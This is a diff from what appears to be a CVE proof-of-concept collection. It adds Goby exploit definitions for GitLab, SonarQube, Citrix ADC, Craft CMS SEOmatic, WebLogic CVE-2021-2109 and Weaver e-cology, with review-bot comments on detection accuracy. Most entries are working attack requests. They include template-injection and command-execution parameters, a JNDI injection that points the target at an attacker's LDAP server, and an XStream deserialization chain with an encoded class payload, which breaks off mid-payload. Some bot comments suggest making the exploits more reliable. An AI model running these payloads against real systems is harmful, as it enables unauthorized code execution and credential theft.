+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "username",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "email",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "@",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/api/graphql",
+ "follow_redirect": true,
+ "header": {
+ "Content-Type": "application/json"
+ },
+ "data_type": "text",
+ "data": "{\"query\":\"{\\nusers {\\nedges {\\n node {\\n username\\n email\\n avatarUrl\\n status {\\n emoji\\n message\\n messageHtml\\n }\\n }\\n }\\n }\\n }\",\"variables\":null,\"operationName\":null}"
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-03-09 13:34:57",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
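Review bot: The response checks only look for the substrings `username`, `email` and `@`, which do not establish that the email leak is present: the first two are field names that appear in any `users` GraphQL response, and a lone `@` can come from a status message or any other field, so a GitLab that returns `"email":null` for other users would presumably still satisfy all three. Anchor the check to a non-null email value instead, e.g. replace the `@` check with `"value": "\"email\":\""` (the key followed by an opening quote only occurs when a string is returned). Separately, `Recommandation` holds the literal `undefined` placeholder leaked from the editor and `Product` carries the affected version range rather than a product name; move `13.4 - 13.6.2` into the Description and set `"Product": "GitLab"`.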
diff --git a/2020/CVE-2020-26413/poc/xray/CVE-2020-26413.yaml b/2020/CVE-2020-26413/poc/xray/CVE-2020-26413.yml
similarity index 100%
rename from 2020/CVE-2020-26413/poc/xray/CVE-2020-26413.yaml
rename to 2020/CVE-2020-26413/poc/xray/CVE-2020-26413.yml
diff --git a/2020/CVE-2020-27986/poc/goby/CVE-2020-27986.json b/2020/CVE-2020-27986/poc/goby/CVE-2020-27986.json
new file mode 100644
index 000000000..e736b52e8
--- /dev/null
+++ b/2020/CVE-2020-27986/poc/goby/CVE-2020-27986.json
@@ -0,0 +1,69 @@
+{
+ "Name": "SonarQube unauth CVE-2020-27986",
+ "Level": "3",
+ "Tags": [
+ "unauth"
+ ],
+ "GobyQuery": "app=\"SonarQube\"",
+ "Description": "SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP, SVN, and GitLab credentials via the api/settings/values URI.",
+ "Product": "SonarQube",
+ "Homepage": "https://www.sonarqube.org/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27986"
+ ],
+ "HasExp": false,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/api/settings/values",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "sonaranalyzer-cs.nuget.packageVersion",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "sonar.core.id",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-29 15:03:58",
+ "GobyVersion": "1.9.310"
+}
\ No newline at end of file
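Review bot: The two body markers, `sonaranalyzer-cs.nuget.packageVersion` and `sonar.core.id`, are present in any settings dump, so a Level-3 hit here only proves that `/api/settings/values` answers without authentication, not that SMTP, SVN or GitLab credentials are in the response as the Description claims. If the entry is meant to flag the actual credential exposure, add a check for a populated secured setting (the key names look like `email.smtp_password.secured` and `sonar.svn.password.secured` in SonarQube, to be confirmed against a live instance); otherwise lower the level and say in the Name that this detects the anonymous settings endpoint. The `SetVariable` entry `output|lastbody|regex|` has an empty pattern and `HasExp` is false, so it extracts nothing; drop it or give it the pattern you intend.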
diff --git a/2020/CVE-2020-27986/poc/xray/CVE-2020-27986.yaml b/2020/CVE-2020-27986/poc/xray/CVE-2020-27986.yml
similarity index 100%
rename from 2020/CVE-2020-27986/poc/xray/CVE-2020-27986.yaml
rename to 2020/CVE-2020-27986/poc/xray/CVE-2020-27986.yml
diff --git a/2020/CVE-2020-28188/poc/xray/CVE-2020-28188.yaml b/2020/CVE-2020-28188/poc/xray/CVE-2020-28188.yml
similarity index 100%
rename from 2020/CVE-2020-28188/poc/xray/CVE-2020-28188.yaml
rename to 2020/CVE-2020-28188/poc/xray/CVE-2020-28188.yml
diff --git a/2020/CVE-2020-3452/poc/xray/CVE-2020-3452.yaml b/2020/CVE-2020-3452/poc/xray/CVE-2020-3452.yml
similarity index 100%
rename from 2020/CVE-2020-3452/poc/xray/CVE-2020-3452.yaml
rename to 2020/CVE-2020-3452/poc/xray/CVE-2020-3452.yml
diff --git a/2020/CVE-2020-35476/poc/xray/CVE-2020-35476.yaml b/2020/CVE-2020-35476/poc/xray/CVE-2020-35476.yml
similarity index 100%
rename from 2020/CVE-2020-35476/poc/xray/CVE-2020-35476.yaml
rename to 2020/CVE-2020-35476/poc/xray/CVE-2020-35476.yml
diff --git a/2020/CVE-2020-35736/poc/xray/CVE-2020-35736.yaml b/2020/CVE-2020-35736/poc/xray/CVE-2020-35736.yml
similarity index 100%
rename from 2020/CVE-2020-35736/poc/xray/CVE-2020-35736.yaml
rename to 2020/CVE-2020-35736/poc/xray/CVE-2020-35736.yml
diff --git a/2020/CVE-2020-5284/poc/xray/CVE-2020-5284.yaml b/2020/CVE-2020-5284/poc/xray/CVE-2020-5284.yml
similarity index 100%
rename from 2020/CVE-2020-5284/poc/xray/CVE-2020-5284.yaml
rename to 2020/CVE-2020-5284/poc/xray/CVE-2020-5284.yml
diff --git a/2020/CVE-2020-5405/poc/xray/CVE-2020-5405.yaml b/2020/CVE-2020-5405/poc/xray/CVE-2020-5405.yml
similarity index 100%
rename from 2020/CVE-2020-5405/poc/xray/CVE-2020-5405.yaml
rename to 2020/CVE-2020-5405/poc/xray/CVE-2020-5405.yml
diff --git a/2020/CVE-2020-5410/poc/xray/CVE-2020-5410.yaml b/2020/CVE-2020-5410/poc/xray/CVE-2020-5410.yml
similarity index 100%
rename from 2020/CVE-2020-5410/poc/xray/CVE-2020-5410.yaml
rename to 2020/CVE-2020-5410/poc/xray/CVE-2020-5410.yml
diff --git a/2020/CVE-2020-5515/poc/xray/CVE-2020-5515.yaml b/2020/CVE-2020-5515/poc/xray/CVE-2020-5515.yml
similarity index 100%
rename from 2020/CVE-2020-5515/poc/xray/CVE-2020-5515.yaml
rename to 2020/CVE-2020-5515/poc/xray/CVE-2020-5515.yml
diff --git a/2020/CVE-2020-5902/poc/xray/CVE-2020-5902.yaml b/2020/CVE-2020-5902/poc/xray/CVE-2020-5902.yml
similarity index 100%
rename from 2020/CVE-2020-5902/poc/xray/CVE-2020-5902.yaml
rename to 2020/CVE-2020-5902/poc/xray/CVE-2020-5902.yml
diff --git a/2020/CVE-2020-7980/poc/xray/CVE-2020-7980.yaml b/2020/CVE-2020-7980/poc/xray/CVE-2020-7980.yml
similarity index 100%
rename from 2020/CVE-2020-7980/poc/xray/CVE-2020-7980.yaml
rename to 2020/CVE-2020-7980/poc/xray/CVE-2020-7980.yml
diff --git a/2020/CVE-2020-8191/poc/xray/CVE-2020-8191.yaml b/2020/CVE-2020-8191/poc/xray/CVE-2020-8191.yml
similarity index 100%
rename from 2020/CVE-2020-8191/poc/xray/CVE-2020-8191.yaml
rename to 2020/CVE-2020-8191/poc/xray/CVE-2020-8191.yml
diff --git a/2020/CVE-2020-8193/poc/goby/CVE-2020-8193.json b/2020/CVE-2020-8193/poc/goby/CVE-2020-8193.json
new file mode 100644
index 000000000..493dc2c5c
--- /dev/null
+++ b/2020/CVE-2020-8193/poc/goby/CVE-2020-8193.json
@@ -0,0 +1,104 @@
+{
+ "Name": "Citrix Unauthorized CVE-2020-8193",
+ "Level": "3",
+ "Tags": [
+ "Unauthorized"
+ ],
+ "GobyQuery": "(app=\"citrix-公司产品\" | title=\"Citrix Login\" | body=\"Citrix ADC\")",
+ "Description": "Improper access control in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows unauthenticated access to certain URL endpoints",
+ "Product": "citrix",
+ "Homepage": "https://www.citrix.com/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [],
+ "HasExp": true,
+ "ExpParams": null,
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1",
+ "follow_redirect": false,
+ "header": {
+ "Content-Type": "application/xml",
+ "X-NITRO-PASS": "{{{str1}}}",
+ "X-NITRO-USER": "{{{str2}}}"
+ },
+ "data_type": "text",
+ "data": "",
+ "set_variable": [
+ "str2|rand|str|8",
+ "str1|rand|str|8"
+ ]
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "406",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$head",
+ "operation": "contains",
+ "value": "SESSID=",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/test.php",
+ "follow_redirect": true,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "test",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-06 14:18:50",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
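Review bot: The ExploitSteps request `/test.php` and assert that the body contains `test`, which has nothing to do with Citrix ADC — it will report exploitation success on any host that happens to serve such a file and failure everywhere else, while `HasExp` is true and `ExpParams` is null. Either set `"HasExp": false` and remove the ExploitSteps, or implement the real follow-up that reuses the `SESSID` obtained in ScanSteps; a placeholder should not ship as an exploit. The detection itself (406 plus a `SESSID=` cookie on the `pcidss/report` POST with random NITRO credentials) is the public fingerprint for this issue, though `$head contains SESSID=` is matched against the whole header block, so any cookie with that name satisfies it. Both `output|lastbody|regex|` entries also carry an empty pattern and should be completed or removed.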
diff --git a/2020/CVE-2020-8193/poc/xray/CVE-2020-8193.yaml b/2020/CVE-2020-8193/poc/xray/CVE-2020-8193.yml
similarity index 100%
rename from 2020/CVE-2020-8193/poc/xray/CVE-2020-8193.yaml
rename to 2020/CVE-2020-8193/poc/xray/CVE-2020-8193.yml
diff --git a/2020/CVE-2020-8209/poc/xray/CVE-2020-8209.yaml b/2020/CVE-2020-8209/poc/xray/CVE-2020-8209.yml
similarity index 100%
rename from 2020/CVE-2020-8209/poc/xray/CVE-2020-8209.yaml
rename to 2020/CVE-2020-8209/poc/xray/CVE-2020-8209.yml
diff --git a/2020/CVE-2020-8515/poc/xray/CVE-2020-8515.yaml b/2020/CVE-2020-8515/poc/xray/CVE-2020-8515.yml
similarity index 100%
rename from 2020/CVE-2020-8515/poc/xray/CVE-2020-8515.yaml
rename to 2020/CVE-2020-8515/poc/xray/CVE-2020-8515.yml
diff --git a/2020/CVE-2020-9376/poc/xray/CVE-2020-9376.yaml b/2020/CVE-2020-9376/poc/xray/CVE-2020-9376.yml
similarity index 100%
rename from 2020/CVE-2020-9376/poc/xray/CVE-2020-9376.yaml
rename to 2020/CVE-2020-9376/poc/xray/CVE-2020-9376.yml
diff --git a/2020/CVE-2020-9483/poc/xray/CVE-2020-9483.yaml b/2020/CVE-2020-9483/poc/xray/CVE-2020-9483.yml
similarity index 100%
rename from 2020/CVE-2020-9483/poc/xray/CVE-2020-9483.yaml
rename to 2020/CVE-2020-9483/poc/xray/CVE-2020-9483.yml
diff --git a/2020/CVE-2020-9496/poc/xray/CVE-2020-9496.yaml b/2020/CVE-2020-9496/poc/xray/CVE-2020-9496.yml
similarity index 100%
rename from 2020/CVE-2020-9496/poc/xray/CVE-2020-9496.yaml
rename to 2020/CVE-2020-9496/poc/xray/CVE-2020-9496.yml
diff --git a/2020/CVE-2020-9597/poc/goby/CVE-2020-9597.json b/2020/CVE-2020-9597/poc/goby/CVE-2020-9597.json
new file mode 100644
index 000000000..20a1c409f
--- /dev/null
+++ b/2020/CVE-2020-9597/poc/goby/CVE-2020-9597.json
@@ -0,0 +1,115 @@
+{
+ "Name": "CraftCMS Seomatic RCE CVE-2020-9597",
+ "Level": "3",
+ "Tags": [
+ "rce"
+ ],
+ "GobyQuery": "(title==\"Welcome to Craft CMS\" | body=\"href=\\\"http://craftcms.com/\\\"\" | body=\"SEOmatic\" | header=\"Craft CMS\" | header=\"Craft CMS, SEOmatic\")",
+ "Description": "The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.",
+ "Product": "craftcms",
+ "Homepage": "https://craftcms.com/",
+ "Author": "aetkrad",
+ "Impact": "",
+ "Recommendation": "",
+ "References": [
+ "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9757"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "Name": "cmd",
+ "Type": "input",
+ "Value": "craft.app.view.evaluateDynamicContent('phpinfo();')"
+ }
+ ],
+ "ExpTips": {
+ "Type": "",
+ "Content": ""
+ },
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/actions/seomatic/meta-container/meta-link-container/?uri={{5*'5'}}",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": [
+ "r1|rand|int|2",
+ "r2|rand|int|2"
+ ]
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "MetaLinkContainer",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "canonical",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "25",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody|regex|"
+ ]
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/actions/seomatic/meta-container/meta-link-container/?uri=%7B%7B{{{cmd}}}%7D%7D",
+ "follow_redirect": false,
+ "header": null,
+ "data_type": "text",
+ "data": "",
+ "set_variable": []
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": [
+ "output|lastbody||"
+ ]
+ }
+ ],
+ "PostTime": "2021-11-11 20:45:35",
+ "GobyVersion": "1.8.302"
+}
\ No newline at end of file
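Review bot: The CVE identifier is inconsistent: the file and `Name` say CVE-2020-9597, but the Description (SEOmatic before 3.3.0, SSTI via the metacontainers controller) and the only reference point at CVE-2020-9757, and this same diff renames a separate xray entry for CVE-2020-9757 — confirm which ID this is and rename the entry, otherwise anything indexing the repository will double-count or mis-link it. The scan step also generates `r1` and `r2` but never uses them: the probe sends the fixed expression `{{5*'5'}}` and then asserts the body contains `25`, a two-character string that appears by chance in timestamps, dimensions and URLs. Use the random operands in the probe and assert their product, or at minimum a product that cannot occur naturally, e.g. `"uri": "/actions/seomatic/meta-container/meta-link-container/?uri=%7B%7B7339*7183%7D%7D"` with `"value": "52716037"`, and drop the unused `set_variable` entries.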
diff --git a/2020/CVE-2020-14181/poc/goby/wait_to_be_added b/2020/CVE-2020-9597/poc/nuclei/wait_to_be_added
similarity index 100%
rename from 2020/CVE-2020-14181/poc/goby/wait_to_be_added
rename to 2020/CVE-2020-9597/poc/nuclei/wait_to_be_added
diff --git a/2020/CVE-2020-26413/poc/goby/wait_to_be_added b/2020/CVE-2020-9597/poc/oneliner/wait_to_be_added
similarity index 100%
rename from 2020/CVE-2020-26413/poc/goby/wait_to_be_added
rename to 2020/CVE-2020-9597/poc/oneliner/wait_to_be_added
diff --git a/2020/CVE-2020-27986/poc/goby/wait_to_be_added b/2020/CVE-2020-9597/poc/others/wait_to_be_added
similarity index 100%
rename from 2020/CVE-2020-27986/poc/goby/wait_to_be_added
rename to 2020/CVE-2020-9597/poc/others/wait_to_be_added
diff --git a/2020/CVE-2020-8193/poc/goby/wait_to_be_added b/2020/CVE-2020-9597/poc/pocsuite2/wait_to_be_added
similarity index 100%
rename from 2020/CVE-2020-8193/poc/goby/wait_to_be_added
rename to 2020/CVE-2020-9597/poc/pocsuite2/wait_to_be_added
diff --git a/2021/CVE-2021-21402/poc/goby/wait_to_be_added b/2020/CVE-2020-9597/poc/pocsuite3/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-21402/poc/goby/wait_to_be_added
rename to 2020/CVE-2020-9597/poc/pocsuite3/wait_to_be_added
diff --git a/2021/CVE-2021-21975/poc/goby/wait_to_be_added b/2020/CVE-2020-9597/poc/xray/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-21975/poc/goby/wait_to_be_added
rename to 2020/CVE-2020-9597/poc/xray/wait_to_be_added
diff --git a/2020/CVE-2020-9757/poc/xray/CVE-2020-9757.yaml b/2020/CVE-2020-9757/poc/xray/CVE-2020-9757.yml
similarity index 100%
rename from 2020/CVE-2020-9757/poc/xray/CVE-2020-9757.yaml
rename to 2020/CVE-2020-9757/poc/xray/CVE-2020-9757.yml
diff --git a/2021/CVE-2021-2109/poc/goby/Weblogic LDAP Internet RCE CVE-2021-2109.json b/2021/CVE-2021-2109/poc/goby/Weblogic LDAP Internet RCE CVE-2021-2109.json
new file mode 100644
index 000000000..da5fbb100
--- /dev/null
+++ b/2021/CVE-2021-2109/poc/goby/Weblogic LDAP Internet RCE CVE-2021-2109.json
@@ -0,0 +1,94 @@
+{
+ "Name": "Weblogic LDAP RCE CVE-2021-2109",
+ "Level": "3",
+ "Tags": [
+ "RCE"
+ ],
+ "GobyQuery": "app=\"Oracle-Weblogic_interface_7001\" || app=\"Oracle-BEA-WebLogic-Server\" || title==\"Error 404--Not Found\"",
+ "Description": "2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8,利用复杂度低。建议用户尽快采取措施,对上述漏洞进行防护。\n\nWebLogic Server 10.3.6.0.0\nWebLogic Server 12.1.3.0.0\nWebLogic Server 12.2.1.3.0\nWebLogic Server 12.2.1.4.0\nWebLogic Server 14.1.1.0.0",
+ "Product": "WebLogicd",
+ "Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html",
+ "Author": "AndU",
+ "Impact": "Internet",
+ "Recommandation": "Internet",
+ "References": [
+ "Internet"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "Cmd",
+ "type": "input",
+ "value": "whoami",
+ "show": ""
+ },
+ {
+ "name": "Ldap",
+ "type": "input",
+ "value": "ldap://xxx.xxx.xxx;xxx:1389",
+ "show": ""
+ },
+ {
+ "name": "Cookie",
+ "type": "input",
+ "value": "ADMINCONSOLESESSION=xxxxx",
+ "show": ""
+ }
+
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/console/css/%252e%252e%252f/consolejndi.portal?",
+ "follow_redirect": true,
+ "header": {},
+ "data_type": "text",
+ "data": ""
+ },
+ "ResponseTest": {
+ "type": "group",
+ "operation": "AND",
+ "checks": [
+ {
+ "type": "item",
+ "variable": "$code",
+ "operation": "==",
+ "value": "200",
+ "bz": ""
+ },
+ {
+ "type": "item",
+ "variable": "$body",
+ "operation": "contains",
+ "value": "JNDI",
+ "bz": ""
+ }
+ ]
+ },
+ "SetVariable": []
+ }
+ ],
+ "ExploitSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "GET",
+ "uri": "/console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{{{Ldap}}}/Basic/WeblogicEcho;AdminServer%22)",
+ "follow_redirect": true,
+ "header": {
+ "cmd": "{{{Cmd}}}",
+ "Cookie":"{{{Cookie}}}"
+ },
+ "data_type": "text",
+ "data": ""
+ },
+ "SetVariable": [
+ "output|lastbody"
+ ]
+ }
+ ],
+ "PostTime": "2021-01-22 13:55:45",
+ "GobyVersion": "1.8.237"
+}
\ No newline at end of file
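Review bot: The Description is an advisory summary of the January 2021 CPU that lists seven other CVEs and never mentions CVE-2021-2109 itself, and `Product`, `Impact`, `Recommandation` and `References` hold the placeholders `WebLogicd` and `Internet`; describe what this entry actually does — JNDI injection through `com.bea.console.handles.JndiBindingHandle` with an attacker-supplied LDAP URL, which is what the ExploitSteps URI carries — and set `"Product": "Oracle WebLogic Server"`. Note also that ScanSteps only verify that `consolejndi.portal` is reachable through the `%252e%252e%252f` console path traversal, so a host is marked vulnerable by proxy (unpatched for that older bypass implies unpatched for this one), while a host that needs the `Cookie` parameter is missed; that caveat belongs in the Description. Finally, exploitation depends on an out-of-band LDAP server supplied via `Ldap`, so `output|lastbody` cannot show success by itself — tell the operator in `ExpTips` that the LDAP listener must be theirs and that the command result is what the listener serves back.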
diff --git a/2021/CVE-2021-22205/poc/goby/wait_to_be_added b/2021/CVE-2021-2109/poc/nuclei/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-22205/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-2109/poc/nuclei/wait_to_be_added
diff --git a/2021/CVE-2021-22986/poc/goby/wait_to_be_added b/2021/CVE-2021-2109/poc/oneliner/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-22986/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-2109/poc/oneliner/wait_to_be_added
diff --git a/2021/CVE-2021-26084/poc/goby/wait_to_be_added b/2021/CVE-2021-2109/poc/others/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-26084/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-2109/poc/others/wait_to_be_added
diff --git a/2021/CVE-2021-3019/poc/goby/wait_to_be_added b/2021/CVE-2021-2109/poc/pocsuite2/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-3019/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-2109/poc/pocsuite2/wait_to_be_added
diff --git a/2021/CVE-2021-36260/poc/goby/wait_to_be_added b/2021/CVE-2021-2109/poc/pocsuite3/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-36260/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-2109/poc/pocsuite3/wait_to_be_added
diff --git a/2021/CVE-2021-36749/poc/goby/wait_to_be_added b/2021/CVE-2021-2109/poc/xray/wait_to_be_added
similarity index 100%
rename from 2021/CVE-2021-36749/poc/goby/wait_to_be_added
rename to 2021/CVE-2021-2109/poc/xray/wait_to_be_added
diff --git a/2021/CVE-2021-21350/poc/goby/Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go b/2021/CVE-2021-21350/poc/goby/Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go
new file mode 100644
index 000000000..a748b0305
--- /dev/null
+++ b/2021/CVE-2021-21350/poc/goby/Weaver_e_cology_OA_XStream_RCE_CVE_2021_21350.go
@@ -0,0 +1,106 @@
+package exploits
+
+import (
+ "git.gobies.org/goby/goscanner/goutils"
+)
+
+func init() {
+ expJson := `{
+ "Name": "Weaver e_cology OA XStream Remote Code Execution",
+ "Level": "3",
+ "Tags": [
+ "RCE"
+ ],
+ "GobyQuery": "app=\"Weaver-OA\"",
+ "Description": "泛微协同管理应用平台(e-cology)是一套兼具企业信息门户、知识管理、数据中心、工作流管理、人力资源管理、客户与合作伙伴管理、项目管理、财务管理、资产管理功能的协同商务平台。泛微e-cology OA系统存在远程代码执行漏洞。该漏洞存在于泛微协同管理应用平台OA系统的BeanShell组件中,该组件为系统自带且允许未授权访问。攻击者通过调用BeanShell组件的问题接口可直接在目标服务器上执行任意命令。",
+ "Product": "Weaver e-cology",
+ "Homepage": "https://www.weaver.com.cn/e9",
+ "Author": "flystart",
+ "Impact": "攻击者可利用此漏洞造成远程代码执行
",
+ "Recommandation": "官方已发布针对此漏洞的修复补丁,受影响用户也可采取下列防护措施对此漏洞进行临时防护。
",
+ "References": [
+ "https://mp.weixin.qq.com/s/YcCydpGNiCrB0F_w6D5eRw"
+ ],
+ "HasExp": true,
+ "ExpParams": [
+ {
+ "name": "cmd",
+ "type": "input",
+ "value": "whoami"
+ }
+ ],
+ "ScanSteps": [
+ "AND",
+ {
+ "Request": {
+ "method": "POST",
+ "uri": "/services%20/WorkflowServiceXml",
+ "follow_redirect": false,
+ "header": {
+ "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE",
+ "Content-Type": "text/xml;charset=UTF-8"
+ },
+ "data_type": "text",
+ "data": "\n \n \n <java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
<comparator class='javafx.collections.ObservableList$1'/>
</default>
<int>3</int>
<com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data>
<dataHandler>
<dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
<contentType>text/plain</contentType>
<is class='java.io.SequenceInputStream'>
<e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
<iterator class='com.sun.tools.javac.processing.JavacProcessingEnvironment$NameProcessIterator'>
<names class='java.util.AbstractList$Itr'>
<cursor>0</cursor>
<lastRet>-1</lastRet>
<expectedModCount>0</expectedModCount>
<outer-class class='java.util.Arrays$ArrayList'>
<a class='string-array'>
<string>$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$5bW$TW$U$fe$G$S$ced$Y$E$83$5cF$ad$a2$z$gT$aei$C$Ek$8d$40$wm$40$rT$8b$da$daar$m$Da$s$ceL$80$5e$ed$fd$7e$b1$7d$b3$7f$c0$d7$f6et$b5$ab$5d$7d$f6$a5k$b5$P$ed$af$a9$ddg$S$94$I$ad$85$b5$f6$9c$7d$fb$ce$be$9c$b3O$ee$fd$fd$e3$_$A$9e$c6$b7$K$o$YQ0$8a$94$mc2N$wx$G$a7d$3c$cbpZ$BC$9a$e1$8c$82qL$I$cbI$n$c9$c8xN$7c$cf$w$98$c2$f3$82$bc$m$p$cb0$zcFA$U$e7d$9cg$b8$mcVFNA$3b$e6$Y$5eTp$R$97$E$f3$92X$cd$x$b8$8c$x$K$f6$e2$aa$8c$97$c5$f7$VA$ae$J$f2$aa$M$9daAA7$M$86$bc$84$86$93$a6ez$a7$q$d4$c7z$$J$I$8d$dby$$$a19kZ$7c$a6$bc$ba$c0$9d9$7d$a1H$92$a6$9c$a7$h$x$d3z$v$e0$c9$952$60$a0$c5$Z$86E$K$8fb$a2$40$IZ$82$92$b3$cb$8e$c13$a6$f0$8bL$ae$e9$c5$bee$7dMW$RC$P$c3$92$8a$CL$V$cbX$91p$d4$b0W$fb$M$bdl$U$ec$3e$8b$7b$eb$b6$b3$d2W4$5d$8f$5b$7dsF$vg$h$x$dc$a3PV$Y$8a$wVaI$d8$bd$c4$bd$f1$b2$e3p$cb$9b$e5$d7$cb$dc$f5$uZ$B$df_$d4$ad$a5$fe$f1$a2$ee$ba$wl$94$q$b4$3c$U$9f$5bX$e6$86G$f1$aa$b8$OG$85$LOE$Z$c2$f7$9a$c3$dd$92m$b9$3c$a3$hz$9e$M$d6$b0N$v$a9$d8$c0k$w$5e$c7$h$94$D$edy$c91$3d$eeH$d8$V$80$9av$ff$a6$a0$x94$9a$i$9aH$a7$T$89$c1$d1$91$c9$c1d$3c$93$i$l$8fg$86$t$e3$99$c1tb$m$a1$e2M$bcU$B9$cbi$H$a7$s$b2$9c$e7$98$d6$92$E6$cb$X$b9$T$A$s$8c$RC$8f$8f$M$e9$7cX$l$k$d0$e3F$o$c9$87$f3I$p$b1$98L$O$c4$f3$86$8a$b7q$83$w$R$80$94$3d$b3$d8$9f3t$cb$e2$O$c3$3b$w$de$c5$7b$w$de$c7$H$w$3e$c4G$M$l$ab$f8$E$9f$8a$da$7f$s$a1$eejZ$c5$e7$f8B$c5$97$f8J$c5$d7$b8$v$B$SZ$l$863$b9a$